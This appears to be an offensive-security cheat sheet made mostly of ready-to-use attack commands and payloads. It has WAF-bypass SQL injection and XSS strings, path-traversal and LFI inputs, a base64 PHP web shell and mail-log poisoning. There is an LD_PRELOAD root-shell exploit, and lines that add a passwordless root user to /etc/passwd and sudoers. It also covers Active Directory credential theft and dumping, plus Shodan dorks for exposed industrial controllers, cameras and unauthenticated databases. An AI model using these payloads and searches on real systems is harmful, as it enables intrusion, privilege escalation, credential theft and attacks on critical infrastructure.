/?id=1+un/**/ion+sel/**/ect+1,2--

# url example
index.php?page_id=-1 %55nION/**/%53ElecT 1,2,3,4'union%a0select pass from users#

index.php?page_id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3

# basic request
http://example/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\

# obfuscated payload
http://example/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\

# basic payload
<script>confirm()</script>

# obfuscated payload
%253Cscript%253Econfirm()%253C%252Fscript%253E

# basic request
/bin/cat /etc/passwd

# obfuscated payload
/???/??t /???/??ss??

# used chars
/ ? t s

# basic request
/bin/nc 127.0.0.1 443

# obfuscated payload
/???/n? 2130706433 443

# used chars
/ ? n [0-9]

# basic request
<script>confirm()</script>

# obfuscated payload
<script>+-+-1-+-+confirm()</script>

# basic request
<BODY onload=confirm()>

# obfuscated payload
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()>

# basic request
<a href=javascript;alert()>ClickMe

# bypassed technique
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe

# check sudo version for exploits
sudo -V | grep “Sudo ver”

# check rights
sudo -l
# gtfobins !

# sudo LD_PRELOAD
Defaults        env_keep += LD_PRELOAD

# COMPILE /tmp/exploit.c :

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
void _init() {
	unsetenv("LD_PRELOAD");
	setgid(0);
	setuid(0);
	system("/bin/sh");
}

# with :

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

# Execute any binary with the LD_PRELOAD to spawn a shell : 

sudo LD_PRELOAD=<full_path_to_so_file> <program>
sudo LD_PRELOAD=/tmp/shell.so find

# sudo_inject | https://github.com/nongiach/sudo_inject

# requirements : 
#    Ptrace fully enabled (/proc/sys/kernel/yama/ptrace_scope == 0).
#    Current user must have living process that has a valid sudo token with the same uid.

sudo whatever
sh exploit.sh

# wait
sudo -i
# root !

ls -la ~/ 
ls -la /var/mail /home/*/ /var/spool/mail /home/*/.bash_history /var

# check those files for hashes
cat /etc/passwd
cat /etc/shadow
ls -la /etc/passwd /etc/shadow

# can we write to the .bashsrc file ? if so, can be executed when us logs in
ls -la /root/.bashrc 
ls -la /home/*/.bashrc
locate .bashrc
find / -name .bashrc -xdev 2>/dev/null

# something is running that we can exploit ?
ps aux | grep root

# localhost open ports ?
netstat -antup

# any useful info in the main bash user files ?
cat /etc/profile 
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout

# check for cronjobs
crontab -l 
ls -alh /var/spool/cron
ls -al /etc/ | grep cron; ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

# PSPY to to see commands run by other users, cron jobs, etc. in real time
./pspy > pspy-out.txt

# unmounted file-systems ?
cat /etc/fstab

# If NFS is open, check if the target has any open NFS shares, if it does, then mount it to your filesystem
showmount -e X.X.X.X
mount X.X.X.X:/ /tmp/mount1

# check installed apps + versions + running ?
ls -alh /usr/bin/ /sbin/ /var/cache/apt/archives /var/cache/yum/
dpkg -l
rpm -qa
# Any useful applications installed? 
which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp tmux screen nmap 2>/dev/null

# Files containing passwords
grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

# ssh
find / -name authorized_keys 2> /dev/null
find / -name id_rsa 2> /dev/null

# World writable files on the system
find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
find / -perm -2 -type f 2>/dev/null
find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null

# writable /etc/passwd
# add :
echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd
su - dummy

# writable /etc/sudoers
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers

# use SUDO without password
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers

# World executable folder
find / -perm -o x -type d 2>/dev/null

# World writable and executable folders
find / \( -perm -o w -perm -o x \) -type d 2>/dev/null

# SUID / SGID
find / -perm -u=s -type f 2>/dev/null | xargs ls -l
find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;
find / -uid 0 -perm -4000 -type f 2>/dev/null 
find / -perm -g=s -type f 2>/dev/null | xargs ls -l
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

# Look for any binaries that seem odd. Any binaries running from a users home directory?
# Check the version of any odd binaries and see if there are any public exploits that can be used to gain root

# SUID PATH
echo $PATH
env | grep PATH
print $PATH

/usr/bin/getcap -r  /usr/bin
getcap -r / 2>/dev/null

## Interesting capabilities
getcap openssl /usr/bin/openssl 
openssl=ep
#  the following capabilities can be used in order to upgrade your current privileges.
cap_dac_read_search # read anything
cap_setuid+ep # setuid

# EXAMPLES
# 1
# linpeas /usr/local/bin/ruby = cap_chown+ep 
echo 'File.chown(<User ID>, nil, "/etc/shadow")' > exploit.rb 
ruby exploit.rb 
chmod 777 /etc/shadow
nano /etc/shadow

# 2
# cap_setuid+ep python2.7
python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
sh-5.0# id
uid=0(root) gid=1000(swissky)

{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}

# url encoded
fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}

# full
fragment FullType on __Type {
  kind
  name
  description
  fields(includeDeprecated: true) {
    name
    description
    args {
      ...InputValue
    }
    type {
      ...TypeRef
    }
    isDeprecated
    deprecationReason
  }
  inputFields {
    ...InputValue
  }
  interfaces {
    ...TypeRef
  }
  enumValues(includeDeprecated: true) {
    name
    description
    isDeprecated
    deprecationReason
  }
  possibleTypes {
    ...TypeRef
  }
}
fragment InputValue on __InputValue {
  name
  description
  type {
    ...TypeRef
  }
  defaultValue
}
fragment TypeRef on __Type {
  kind
  name
  ofType {
    kind
    name
    ofType {
      kind
      name
      ofType {
        kind
        name
        ofType {
          kind
          name
          ofType {
            kind
            name
            ofType {
              kind
              name
              ofType {
                kind
                name
              }
            }
          }
        }
      }
    }
  }
}

query IntrospectionQuery {
  __schema {
    queryType {
      name
    }
    mutationType {
      name
    }
    types {
      ...FullType
    }
    directives {
      name
      description
      locations
      args {
        ...InputValue
      }
    }
  }
}

dir # uses directory/file enumeration mode
dns # uses dns subdomain enumeration mode
fuzz # uses fuzzing mode
help # help about any command
s3 # uses aws bucket enumeration mode
version # shows the current version
vhost # uses vhost enumeration mode

--delay <duration> # Time each thread waits between requests (e.g. 1500ms)
-h # help for gobuster
--no-error # Don't display errors
-z # Don't display progress
-o <string> # Output file to write results
-p <string> # File containing replacement patterns
-q # Don't print the banner and other noise
-t <int> # Number of concurrent threads (default 10)
-v # Verbose output (errors)
-w <string> # Path to the wordlist

# discover txt,html,js,json,php,py files
gobuster dir -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,js,json,php,py

# exclude 403,404 codes
gobuster dir -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -b 403 404

# discover 0.0.0.0 subdomains 
gobuster dns -d http://0.0.0.0 -w /usr/share/SecLists/Discovery/DNS/namelist.txt

# discover txt,html,js,json,php,py files using a proxy connection
gobuster dir -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,js,json,php,py --proxy http://127.0.0.1:8081

#seclist
feroxbuster -t 10 -u http://0.0.0.0 -w /usr/share/seclists/Discovery/Web-Content/common.txt -o feroxbuster

#dirbuster
feroxbuster -t 10 -u http://0.0.0.0 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o feroxbuster

feroxbuster -t 10 -u http://0.0.0.0 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o feroxbuster

feroxbuster -t 10 -u https://0.0.0.0 -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -o feroxbuster

feroxbuster -t 10 -u https://0.0.0.0 -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o feroxbuster

# search for directories & put 404 responses away
wfuzz -w  /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  --hc 404 http://0.0.0.0/FUZZ

# search for php files
wfuzz -w wordlist/general/common.txt http://0.0.0.0/FUZZ.php

# use 2 wordlists for user & pass & put 302 responses away
wfuzz -z file,/usr/share/wordlists/rockyou.txt -d "uname=FUZZ&pass=FUZZ"  --hc 302 http://0.0.0.0/userinfo.php

/**
* Get the filename from a GET input
* Example - http://example.com/?file=filename.php
*/
$file = $_GET['file'];

/**
* Unsafely include the file
* Example - filename.php
*/
include('directory/' . $file);

http://example.com/index.php?page=../../../etc/passwd
http://example.thm.labs/page.php?file=/etc/passwd 

# NULL BYTE
http://example.thm.labs/page.php?file=../../../../../../etc/passwd%00 

# FILTER BYPASS TRICKS
http://example.com/index.php?page=....//....//etc/passwd
http://example.thm.labs/page.php?file=....//....//....//....//etc/passwd 
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

# DOUBLE ENCODING
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

# UTF-8 ENCODING
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00

http://example.com/page.php?file=php://filter/resource=/etc/passwd

http://example.com/page.php?file=php://filter/read=string.rot13/resource=/etc/passwd

http://example.com/page.php?file=php://filter/convert.base64-encode/resource=/etc/passwd

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=

root@kali:~# telnet 10.10.10.10. 25
Trying 10.10.10.10....
Connected to 10.10.10.10..
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
helo ok
250 straylight
mail from: [email protected]
250 2.1.0 Ok
rcpt to: root
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: <?php echo system($_GET["cmd"]); ?>
data2
.

nsupdate
> server $ip_target $port_dns_target
> key $key_algorithm:$name_key $secret
> zone $dns_name
> update add mail.$target_domain 86400 A $ip_host
> send

# start python smtpd server to receive mail
python3 -m smtpd -c DebuggingServer -n $ip_host:25

# check what infos you can see
wireshark

# nmap
# BEST - https://miloserdov.org/?p=5248
# discover
sudo nmap -v -sn -PE -n --min-hostgroup 1024 --min-parallelism 1024 -oX nmap_output.xml $network_ip
# extract the hosts
grep -A 2 'up' nmap_output.xml | grep -E -o '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > hosts.txt
# scan them, find routers
sudo nmap -v -PE -n --min-hostgroup 1024 --min-parallelism 1024 -p 80,443,8080,1080 --open -iL hosts.txt -oX nmap_routers.xml

# OTHERS
# Ping discovery, Top 20, fragment packets, no DNS resolution
nmap -v --top-ports 20 $ip/24 -f -n --open -oA
# Ping discovery, Top 200, fragment packets, no DNS resolution, service version
nmap -v --top-ports 200 $ip/24 -f -n -sV --open -oA
# Top 1000, fragment packets, no DNS resolution, service version, all alive (no ping)
nmap -v --top-ports 1000 $ip/24 -f -n -sV -Pn --open -oA

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

# Get domain name
cme smb 10.10.10.10
smbmap -H $dc_ip -u '' -p ''

# Detect SMB on network
responder-RunFinger -i X.X.X.0/24

# Find DC
nslookup -q=srv _ldap._tcp.dc._msdcs.<domain.name>
nslookup -type=srv _ldap._tcp.<domain.name> | grep ldap | cut -d ' ' -f 6 | sed 's/\.$//g'

# Enumerate DC
ldapsearch -h <DC.IP> -x -s base namingcontexts

# Check for null session, if got users go for ASREPRoast with GetNPUsers
ldapsearch -h <DC.IP> -x -b "DC=XX,DC=XX"

# Get hashes with no krb preauth
GetNPUsers.py [Domain Name]/ -dc-ip [Domain Controller IP address] -request
GetNPUsers.py 'DC.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.10

# Get Users List
GetADUsers.py DC.local/ -dc-ip $dc_ip -debug

# Get Users from ldap
windapsearch -U — full — dc-ip $dc_ip

# Get base domain
ldapsearch -x -h $dc_ip -s base namingcontexts

# Get more info from DC
ldapsearch -x -h $dc_ip -b ‘DC=DCNAME,DC=LOCAL’

# User Domain info
Get-ADUser $name

# Forest info
Get-ADForest

# Get all computers in the current domain
Get-NetComputer

# Kerberoasting (hashcat 13100)
GetUserSPNs.py -request -save -dc-ip <IP> domain/user # hashcat 13100

# Bruteforce usernames and passwords with kerbrute
kerbrute.py -d <DC.LOCAL> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

# ASREPRoast (hashcat 18200)
GetNPUsers.py <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

# PTH/PTK
# Request ticket
getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
getTGT.py <domain_name>/<user_name>:[password]
# Set ticket
export KRB5CCNAME=<TGT_ccache_file>
# Use it
psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
psexec.py -hashes 'hash' -dc-ip 10.10.10.10 [email protected]
smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

# Enum AD AIO
# https://github.com/CasperGN/ActiveDirectoryEnumeration
python3 -m ade --dc <domain.name> -u <[email protected]> --help
# https://github.com/adrecon/ADRecon from Windows on Domain

# windapsearch
# https://github.com/ropnop/go-windapsearch
windapsearch -d <domain>.<name> -u <user> -p <password> --help

# LDAP
# best tool : ldeep - https://github.com/franc-pentest/ldeep
ldeep ldap -u <USER> -p <PASSWORD> -d <DOMAIN> -s ldap://<DC_IP_OR_LDAP_SERV> all ldap_dump_

# Domain users
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(&(objectClass=user)(objectCategory=person))" name sAMAccountName userPrincipalName memberOf primaryGroupID adminCount userAccountControl description servicePrincipalName objectSid pwdLastSet lastLogon -E pr=1000/noprompt | tee domain_users.txt

# Domain computers
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=computer)" name dNSHostname memberOf operatingSystem operatingSystemVersion lastLogonTimestamp servicePrincipalName description userAccountControl | tee domain_computers.txt

# Domain groups
ldapsearch -LLL -x -H ldap://<DC.IP> -D "<USER>@<DOMAIN.NAME>" -w '<PASSWORD>' -b dc=<DOMAIN NAME>,dc=<DOMAIN NAME> -o ldif-wrap=no "(objectClass=group)" name sAMAccountName memberOf member description objectSid | tee domain_groups.txt

# RPClient - enumeration users, groups, ...
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c dsr_enumtrustdom
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomains
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomusers
rpcclient -U "DOMAIN/username%password" <domaincontroller name or IP>" -c enumdomgroups

# CME
# Run commands
# can you access sensitive shares ? check for SYSVOL
cme smb <IP> -u <USER> -p '<PASS>' --shares

# PS
cme smb <IP> -u <USER> -p '<PASS>' -X 'Get-Host'
# CMD
cme smb <IP> -u <USER> -p '<PASS>' -x whoami
# PTH
cme smb <IP> -u <USER> -H <NTHASH> -x whoami
# Other methods
cme smb <IP> -u <USER> -p '<PASS>' --exec-method {mmcexec,smbexec,atexec,wmiexec}

# Dumps
# LSASSY
cme smb <IP> -d <DOMAIN> -u <USER> -p <PASS> -M lsassy
# SAM
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sam
# LSA
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --lsa
# Sessions
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --sessions
# Logged users
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --loggedon-users
# Disks
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --disks
# Users
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --users #Enumerate users
# Groups
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --groups
# Local groups
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --local-groups
# Password policy
cme smb <IP> -d <DOMAIN> -u <USER> -p '<PASS>' --pass-pol

Dorks

Working with Dorks

Online Services:

— A continuously expanding catalog of dorks with an integrated search function.
— A search engine featuring a built-in dork builder.
— An online Google dorks builder focused on discovering sensitive pages..
— Google Dorking Usage

Apps

— Automates the search for potentially vulnerable web pages using dorks from the Google Hacking Database.
— A web-based PHP utility for automating Google Dorks usage, cleaning, and saving search results.
— Another tool for automating dork searches, written in Golang.
— A utility for identifying vulnerabilities and misconfigurations in web servers.

Google

Google hacking, also named Google Dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Google dorking could also be used for OSINT.

Disclaimer: It is highly advised that you use the information you find for legal purposes only. The unauthorized access of information can lead to a criminal proceeding against you. So use Google hacking with care (and written permission).

Tools

metagoofil

Base

Links

Sensitive Directories

Vulnerable Websites

Juicy Files

Database

Shodan

Resources

Basic

port: Search by specific port

net: Search based on an IP/CIDR

hostname: Locate devices by hostname

os: Search by Operating System

city: Locate devices by city

country: Locate devices by country

geo: Locate devices by coordinates

org: Search by organization

before/after: Timeframe delimiter

hash: Search based on banner hash

has_screenshot:true Filter search based on a screenshot being present

title: Search based on text within the title

asn: Search ASN e.g. 'AS12345'

ssl.jarm: Search by JARM fingerprint

Examples

net:

Find devices based on an IP address or /x CIDR. net:210.214.0.0/16

Organization

Autonomous System Number (ASN)

asn:ASxxxx

os:

Find devices based on operating system. os:"windows 7"

port:

Find devices based on open ports. proftpd port:21

before/after:

Find devices before or after between a given time. apache after:22/02/2009 before:14/3/2010

SSL/TLS Certificates

Self signed certificates ssl.cert.issuer.cn:example.com ssl.cert.subject.cn:example.com

Expired certificates ssl.cert.expired:true

ssl.cert.subject.cn:example.com

Device Type

Operating System

Product

Customer Premises Equipment (CPE)

Server

ssh fingerprints

dc:14:de:8e:d7:c1:15:43:23:82:25:81:d2:59:e8:c0

Dorks

Pulse Secure

http.html:/dana-na

PEM Certificates

http.title:"Index of /" http.html:".pem"

Databases

MySQL

"product:MySQL"

MongoDB

"product:MongoDB" mongodb port:27017

Fully open MongoDBs

"MongoDB Server Information { "metrics":" "Set-Cookie: mongo-express=" "200 OK"

Kibana dashboards without authentication

kibana content-legth:217

elastic

port:9200 json port:"9200" all:elastic

Memcached

"product:Memcached"

CouchDB

"product:CouchDB" port:"5984"+Server: "CouchDB/2.1.0"

PostgreSQL

"port:5432 PostgreSQL"

Riak

"port:8087 Riak"

Redis

"product:Redis"

Cassandra

"product:Cassandra"

Industrial Control Systems

Samsung Electronic Billboards

"Server: Prismview Player"

Gas Station Pump Controllers

"in-tank inventory" port:10001

Fuel Pumps connected to internet:

No auth required to access CLI terminal.\ "privileged command" GET

Automatic License Plate Readers

P372 "ANPR enabled"

Traffic Light Controllers / Red Light Cameras

mikrotik streetlight

Voting Machines in the United States

"voter system serial" country:US

Open ATM:

May allow for ATM Access availability NCR Port:"161"

Telcos Running Cisco Lawful Intercept Wiretaps

"Cisco IOS" "ADVIPSERVICESK9_LI-M"

Prison Pay Phones

"[2J[H Encartele Confidential"

Tesla PowerPack Charging Status

http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

Electric Vehicle Chargers

"Server: gSOAP/2.8" "Content-Length: 583"

Maritime Satellites

Shodan made a pretty sweet Ship Tracker that maps ship locations in real time, too!

"Cobham SATCOM" OR ("Sailor" "VSAT")

Submarine Mission Control Dashboards

title:"Slocum Fleet Mission Control"

CAREL PlantVisor Refrigeration Units

"Server: CarelDataServer" "200 Document follows"

Nordex Wind Turbine Farms

http.title:"Nordex Control" "Windows 2000 5.0 x86" "Jetty/3.1 (JSP 1.1; Servlet 2.2; java 1.6.0_14)"

C4 Max Commercial Vehicle GPS Trackers

"[1m[35mWelcome on console"

DICOM Medical X-Ray Machines

Secured by default, thankfully, but these 1,700+ machines still have no business being on the internet.

"DICOM Server Response" port:104

GaugeTech Electricity Meters

"Server: EIG Embedded Web Server" "200 Document follows"

Siemens Industrial Automation

"Siemens, SIMATIC" port:161

Siemens HVAC Controllers

"Server: Microsoft-WinCE" "Content-Length: 12581"

Door / Lock Access Controllers

"HID VertX" port:4070

Railroad Management

"log off" "select the appropriate"

Tesla Powerpack charging Status:

Helps to find the charging status of tesla powerpack. http.title:"Tesla PowerPack System" http.component:"d3" -ga3ca4f2

XZERES Wind Turbine

title:"xzeres wind"

PIPS Automated License Plate Reader

"html:"PIPS Technology ALPR Processors""

Modbus

"port:502"

Niagara Fox

"port:1911,4911 product:Niagara"

GE-SRTP

"port:18245,18246 product:"general electric""

MELSEC-Q

"port:5006,5007 product:mitsubishi"

CODESYS

"port:2455 operating system"

"port:102"

BACnet

"port:47808"

HART-IP

"port:5094 hart-ip"

Omron FINS

"port:9600 response code"

IEC 60870-5-104

"port:2404 asdu address"

DNP3

"port:20000 source address"

EtherNet/IP

"port:44818"

PCWorx

"port:1962 PLC"

Crimson v3.0

"port:789 product:"Red Lion Controls"

ProConOS

"port:20547 PLC"

Remote Desktop

Unprotected VNC

"authentication disabled" port:5900,5901 "authentication disabled" "RFB 003.008"

Windows RDP

99.99% are secured by a secondary Windows login screen.

"\x03\x00\x00\x0b\x06\xd0\x00\x00\x124\x00"

Network Infrastructure

CobaltStrike Servers

product:"cobalt strike team server" ssl.cert.serial:146473198 - default certificate serial number ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1

Hacked routers:

Routers which got compromised\ hacked-router-help-sos

Redis open instances

product:"Redis key-value store"

Citrix:

Find Citrix Gateway.\ title:"citrix gateway"

Weave Scope Dashboards

Command-line access inside Kubernetes pods and Docker containers, and real-time visualization/monitoring of the entire infrastructure.

title:"Weave Scope" http.favicon.hash:567176827

MongoDB

Older versions were insecure by default. Very scary.

"MongoDB Server Information" port:27017 -authentication

Mongo Express Web GUI

Like the infamous phpMyAdmin but for MongoDB.

"Set-Cookie: mongo-express=" "200 OK"

Jenkins CI

"X-Jenkins" "Set-Cookie: JSESSIONID" http.title:"Dashboard"

Jenkins:

Jenkins Unrestricted Dashboard x-jenkins 200

Docker APIs

"Docker Containers:" port:2375

Docker Private Registries

"Docker-Distribution-Api-Version: registry" "200 OK" -gitlab

Pi-hole Open DNS Servers

"dnsmasq-pi-hole" "Recursion: enabled"

Already Logged-In as root via Telnet

"root@" port:23 -login -password -name -Session

Telnet Access:

NO password required for telnet access.\ port:23 console gateway

Polycom video-conference system no-auth shell

"polycom command shell"

NPort serial-to-eth / MoCA devices without password

nport -keyin port:23

Android Root Bridges

A tangential result of Google's sloppy fractured update approach. 🙄 More information here.

"Android Debug Bridge" "Device" port:5555

Lantronix Serial-to-Ethernet Adapter Leaking Telnet Passwords

Lantronix password port:30718 -secured

Citrix Virtual Apps

"Citrix Applications:" port:1604

Cisco Smart Install

Vulnerable (kind of "by design," but especially when exposed).

"smart install client active"

PBX IP Phone Gateways

PBX "gateway console" -password port:23

Polycom Video Conferencing

http.title:"- Polycom" "Server: lighttpd" "Polycom Command Shell" -failed port:23

Telnet Configuration:

"Polycom Command Shell" -failed port:23

Example: Polycom Video Conferencing

Bomgar Help Desk Portal

"Server: Bomgar" "200 OK"

Intel Active Management CVE-2017-5689

"Intel(R) Active Management Technology" port:623,664,16992,16993,16994,16995 ”Active Management Technology”

HP iLO 4 CVE-2017-12542

HP-ILO-4 !"HP-ILO-4/2.53" !"HP-ILO-4/2.54" !"HP-ILO-4/2.55" !"HP-ILO-4/2.60" !"HP-ILO-4/2.61" !"HP-ILO-4/2.62" !"HP-iLO-4/2.70" port:1900

Lantronix ethernet adapter’s admin interface without password

"Press Enter for Setup Mode port:9999"

Wifi Passwords:

Helps to find the cleartext wifi passwords in Shodan. html:"def_wirelesspassword"

Misconfigured Wordpress Sites:

The wp-config.php if accessed can give out the database credentials. http.html:"* The wp-config.php creation script uses this file"

Outlook Web Access:

Exchange 2007

"x-owa-version" "IE=EmulateIE7" "Server: Microsoft-IIS/7.0"

Exchange 2010

"x-owa-version" "IE=EmulateIE7" http.favicon.hash:442749392

Exchange 2013 / 2016

"X-AspNet-Version" http.title:"Outlook" -"x-owa-version"

Lync / Skype for Business

"X-MS-Server-Fqdn"

Network Attached Storage (NAS)

SMB (Samba) File Shares

Produces ~500,000 results...narrow down by adding "Documents" or "Videos", etc.

"Authentication: disabled" port:445

Specifically domain controllers:

"Authentication: disabled" NETLOGON SYSVOL -unix port:445

Concerning default network shares of QuickBooks files:

"Authentication: disabled" "Shared this folder to access QuickBooks files OverNetwork" -unix port:445

FTP Servers with Anonymous Login

"220" "230 Login successful." port:21

Iomega / LenovoEMC NAS Drives

"Set-Cookie: iomega=" -"manage/login.html" -http.title:"Log In"

Buffalo TeraStation NAS Drives

Redirecting sencha port:9000

Logitech Media Servers

"Server: Logitech Media Server" "200 OK"

Example: Logitech Media Servers

Plex Media Servers

"X-Plex-Protocol" "200 OK" port:32400

Tautulli / PlexPy Dashboards

"CherryPy/5.1.0" "/home"

Home router attached USB

"IPC$ all storage devices"

Webcams

Generic camera search

title:camera

Webcams with screenshots

webcam has_screenshot:true

D-Link webcams

"d-Link Internet Camera, 200 OK"

Hipcam

"Hipcam RealServer/V1.0"

Yawcams

"Server: yawcam" "Mime-Type: text/html"

webcamXP/webcam7

("webcam 7" OR "webcamXP") http.component:"mootools" -401

Android IP Webcam Server

"Server: IP Webcam Server" "200 OK"

Security DVRs

html:"DVR_H264 ActiveX"

Surveillance Cams:

With username:admin and password: :P\ NETSurveillance uc-httpd Server: uc-httpd 1.0.0

Printers & Copiers:

HP Printers

"Serial Number:" "Built:" "Server: HP HTTP"

Xerox Copiers/Printers

ssl:"Xerox Generic Root"

Epson Printers

"SERVER: EPSON_Linux UPnP" "200 OK"

"Server: EPSON-HTTP" "200 OK"

Canon Printers

"Server: KS_HTTP" "200 OK"

"Server: CANON HTTP Server"

Home Devices

Yamaha Stereos

"Server: AV_Receiver" "HTTP/1.1 406"

Apple AirPlay Receivers

Apple TVs, HomePods, etc.

"\x08_airplay" port:5353

Chromecasts / Smart TVs

"Chromecast:" port:8008

Crestron Smart Home Controllers

"Model: PYNG-HUB"

Random Stuff

Calibre libraries

"Server: calibre" http.status:200 http.title:calibre

OctoPrint 3D Printer Controllers

title:"OctoPrint" -title:"Login" http.favicon.hash:1307375944

Ethereum Miners

"ETH - Total speed"

Apache Directory Listings

Substitute .pem with any extension or a filename like phpinfo.php.

http.title:"Index of /" http.html:".pem"

Misconfigured WordPress

Exposed wp-config.php files containing database credentials.

